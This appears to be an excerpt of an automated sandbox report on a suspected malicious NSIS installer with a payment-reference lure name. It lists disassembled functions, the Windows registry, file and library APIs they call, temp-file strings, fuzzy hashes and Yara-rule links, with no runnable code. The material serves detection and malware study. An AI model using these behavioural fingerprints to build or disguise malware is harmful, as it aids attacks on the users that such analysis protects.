Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nso1577.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nso1577.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nso1577.tmp
API String ID: 2655323295-1657697054
Opcode ID: 631a5d22b5e570bb7e3b4f1968826d0039bf86b5faa60468192ff02330da8f69
Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
Opcode Fuzzy Hash: 631a5d22b5e570bb7e3b4f1968826d0039bf86b5faa60468192ff02330da8f69
Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68

Uniqueness

Uniqueness Score: -1.00%

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00406044
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F

Strings

nsa, xrefs: 00406033
C:\Users\user\AppData\Local\Temp\, xrefs: 0040602B

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

Uniqueness

Uniqueness Score: -1.00%

Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
GetFileAttributesW.KERNELBASE(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE

Uniqueness

Uniqueness Score: -1.00%

Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
RegCloseKey.KERNELBASE(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426

Strings

: Completed, xrefs: 004063DC

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: eb63b2b6e338388614513e0d23c9cea74ee8085ea90cd044aa1dbd5ff4645262
Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
Opcode Fuzzy Hash: eb63b2b6e338388614513e0d23c9cea74ee8085ea90cd044aa1dbd5ff4645262
Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D

Uniqueness

Uniqueness Score: -1.00%

Function 004022FF Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

